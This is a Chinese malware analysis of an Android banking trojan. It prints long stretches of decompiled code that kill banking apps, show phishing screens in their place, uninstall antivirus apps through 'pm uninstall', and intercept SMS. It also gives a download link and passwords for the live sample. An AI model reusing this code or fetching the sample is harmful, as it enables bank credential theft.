android病毒“银行悍匪”独家分析
- 时间:2015年04月02日 15:11:14 来源:魔法猪系统重装大师官网 人气:11876
一、 病毒样本基本信息
FileName: b5910a432d2b866e1028f31874edb32f .apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 Byte
Package:langthing.nend
Download:http://yunpan.cn/Q4qHuRLaNivtd 访问密码 3a90 解压密码:52pojie
// 该病毒首先伪装成系统程序防止卸载;然后试着去卸载安全软件;监测各种银行应用;对需要拦截短信的关键字进行了加密,增加了分析的难度;没有MAIN和LAUNCHER组件,安装后没有图标,防止用户察觉到安装了应用
二、 病毒代码分析
查看AndroidManifest.xml配置文件,可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等,且没有MAIN和LAUNCHER组件
xmlns:android="http://schemas.android.com/apk/res/android"> 查看AndroidManifest.xml配置文件,可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序 receiver android:name=".TReceiver"> 恶意注入代码的代码树如下: 查看langthing.nend.main伪装成系统代码如下: private void b() { Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN"); localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c); localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------"); // 伪装成系统应用 startActivityForResult(localIntent, 1); } 当应用监测到银行客户端启动时,就会终止个银行进程,并为工商银行、淘宝等定制了高仿真“钓鱼界面” private void e() { ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity; ActivityManager localActivityManager = (ActivityManager)getSystemService("activity"); String str = localComponentName.getClassName(); if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz"))) { if (a(getApplicationContext(), "com.icbc")) localActivityManager.restartPackage("com.icbc"); if (a(getApplicationContext(), "com.chinamworld.main")) localActivityManager.restartPackage("com.chinamworld.main"); if (a(getApplicationContext(), "com.bankcomm")) localActivityManager.restartPackage("com.bankcomm"); if (a(getApplicationContext(), "com.taobao.taobao")) localActivityManager.restartPackage("com.taobao.taobao"); if (a(getApplicationContext(), "com.android.bankabc")) localActivityManager.restartPackage("com.android.bankabc"); if (a(getApplicationContext(), "cmb.pb")) localActivityManager.restartPackage("cmb.pb"); if (a(getApplicationContext(), "com.rytong.bankgdb")) localActivityManager.restartPackage("com.rytong.bankgdb"); if (a(getApplicationContext(), "com.cib.bankcib")) localActivityManager.restartPackage("com.cib.bankcib"); if (a(getApplicationContext(), "com.rytong.bankps")) localActivityManager.restartPackage("com.rytong.bankps"); if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank")) localActivityManager.restartPackage("cn.com.njcb.android.mobilebank"); if (a(getApplicationContext(), "com.ecitic.bank.mobile")) localActivityManager.restartPackage("com.ecitic.bank.mobile"); if (a(getApplicationContext(), "com.cebbank.bankebb")) localActivityManager.restartPackage("com.cebbank.bankebb"); if (a(getApplicationContext(), "cn.com.cmbc.mbank")) localActivityManager.restartPackage("cn.com.cmbc.mbank"); if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per")) localActivityManager.restartPackage("cn.com.spdb.mobilebank.per"); if (a(getApplicationContext(), "com.pingan.pabank.activity")) localActivityManager.restartPackage("com.pingan.pabank.activity"); if (a(getApplicationContext(), "com.gzrcb.mobilebank")) localActivityManager.restartPackage("com.gzrcb.mobilebank"); if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per")) localActivityManager.restartPackage("cn.com.cqb.mobilebank.per"); if (a(getApplicationContext(), "com.chinamworld.bocmbci")) localActivityManager.restartPackage("com.chinamworld.bocmbci"); if (a(getApplicationContext(), "com.rytong.app.bankhx")) localActivityManager.restartPackage("com.rytong.app.bankhx"); if (a(getApplicationContext(), "com.csii.huzhou.mobilebank")) localActivityManager.restartPackage("com.csii.huzhou.mobilebank"); if (a(getApplicationContext(), "cn.com.shbank.mper")) localActivityManager.restartPackage("cn.com.shbank.mper"); if (a(getApplicationContext(), "com.rytong.bankqd")) localActivityManager.restartPackage("com.rytong.bankqd"); if (a(getApplicationContext(), "com.tlbank")) localActivityManager.restartPackage("com.tlbank"); if (a(getApplicationContext(), "com.sookin.scyh")) localActivityManager.restartPackage("com.sookin.scyh"); if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per")) localActivityManager.restartPackage("cn.com.hzb.mobilebank.per"); if (a(getApplicationContext(), "com.chinamworld.klb")) localActivityManager.restartPackage("com.chinamworld.klb"); } if (str.contains("icbc")) { Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null); if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.icbc"); new Intent("android.intent.action.MAIN"); Intent localIntent53 = new Intent("android.intent.action.MAIN"); localIntent53.setFlags(268435456); localIntent53.addCategory("android.intent.category.HOME"); startActivity(localIntent53); Intent localIntent54 = new Intent(getApplicationContext(), gs.class); localIntent54.setFlags(268435456); startActivity(localIntent54); } } if (str.contains("com.chinamworld.main")) { Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null); if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.chinamworld.main"); new Intent("android.intent.action.MAIN"); Intent localIntent51 = new Intent("android.intent.action.MAIN"); localIntent51.setFlags(268435456); localIntent51.addCategory("android.intent.category.HOME"); startActivity(localIntent51); Intent localIntent52 = new Intent(getApplicationContext(), js.class); localIntent52.setFlags(268435456); startActivity(localIntent52); } } if (str.contains("bankcomm")) { Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null); if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.bankcomm"); new Intent("android.intent.action.MAIN"); Intent localIntent49 = new Intent("android.intent.action.MAIN"); localIntent49.setFlags(268435456); localIntent49.addCategory("android.intent.category.HOME"); startActivity(localIntent49); Intent localIntent50 = new Intent(getApplicationContext(), jt.class); localIntent50.setFlags(268435456); startActivity(localIntent50); } } if (str.contains("taobao")) { Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null); if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.taobao.taobao"); new Intent("android.intent.action.MAIN"); Intent localIntent47 = new Intent("android.intent.action.MAIN"); localIntent47.setFlags(268435456); localIntent47.addCategory("android.intent.category.HOME"); startActivity(localIntent47); Intent localIntent48 = new Intent(getApplicationContext(), tb.class); localIntent48.setFlags(268435456); startActivity(localIntent48); } // 终止各银行进程 查找安全软件并卸载安全软件 for (g = "Already root"; ; g = "NOroot") { this.C = 5; this.E = 5; this.B = new String[this.C]; this.D = new String[this.E]; this.B[0] = "pm uninstall com.qihoo360.mobilesafe"; //卸载360、腾讯、金山等相关的安全软件 this.B[1] = "pm uninstall com.tencent.qqpimsecure"; this.B[2] = "pm uninstall com.ijinshan.mguard"; this.B[3] = "pm uninstall com.ijinshan.duba"; this.B[4] = "pm uninstall com.anguanjia.safe"; this.D[0] = "com.qihoo360.mobilesafe"; this.D[1] = "com.tencent.qqpimsecure"; this.D[2] = "com.ijinshan.mguard"; this.D[3] = "com.ijinshan.duba"; this.D[4] = "com.anguanjia.safe"; this.s = new o(); 拦截相关短信: f (i5 == 1) if ((server.f == 0) && (server.a != i3)) { server.a(this.a, 1); server.b(this.a, i3); str4 = "接收"; server.a(this.a, new o()); String str5 = server.d(this.a).a(this.a.getApplicationContext()); server.a(this.a, new n()); server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5); localStringBuilder.append("[ "); localStringBuilder.append(str1 + ", "); localStringBuilder.append(i4 + ", "); localStringBuilder.append(str2 + ", "); localStringBuilder.append(str3 + ", "); localStringBuilder.append(str4); localStringBuilder.append(" ]\n\n"); if (!localCursor1.isClosed()) localCursor1.close(); } } while (true) { localStringBuilder.append("getSmsInPhone has executed!"); super.onChange(paramBoolean); return; server.f = 0; break; if (i5 != 2) break; if (server.b == i3) break label760; Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC"); if (localCursor2.moveToFirst()) { localCursor2.getColumnIndex("_id"); int i6 = localCursor2.getColumnIndex("sSend"); do server.a(this.a, localCursor2.getString(i6)); while (localCursor2.moveToNext()); } localCursor2.close(); if (server.h(this.a).equals("1")) { server.a(this.a, new o()); server.a(this.a, new n()); String str6 = server.d(this.a).a(this.a.getApplicationContext()); server.a(this.a, str2 + ";" + str1, str6); } server.b = i3; str4 = "发送"; break; localStringBuilder.append("no result!"); } } catch (SQLiteException localSQLiteException) { while (true) { continue; label760: String str4 = "null"; } } } } 解密密钥: public void a() { try { InputStream localInputStream = getAssets().open("unhi.db"); // 密钥 FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db"); byte[] arrayOfByte = new byte[1024]; while (true) { int i1 = localInputStream.read(arrayOfByte); if (i1 <= 0) { localFileOutputStream.flush(); localFileOutputStream.close(); localInputStream.close(); return; } localFileOutputStream.write(arrayOfByte, 0, i1); } } catch (Exception localException) { } } public void a(String paramString) { if (!new File(paramString).exists()) a(); } public void c() { new l(this).start(); } public IBinder onBind(Intent paramIntent) { return null; } public void onCreate() { this.u = new e(); IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED"); localIntentFilter.setPriority(2147483647); registerReceiver(this.u, localIntentFilter); p = (ActivityManager)getSystemService("activity"); this.F = 0; this.j = false; b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL); this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/"); a(this.q + "unhi.db"); c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1); m localm = new m(this, new Handler()); getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm); Intent localIntent = new Intent(getApplicationContext(), log.class); localIntent.setFlags(268435456); startService(localIntent); 三、 总结 该病毒尝试着去卸载安全软件;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。 // 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。
当程序安装后,会伪装成系统程序,防止卸载。如图:
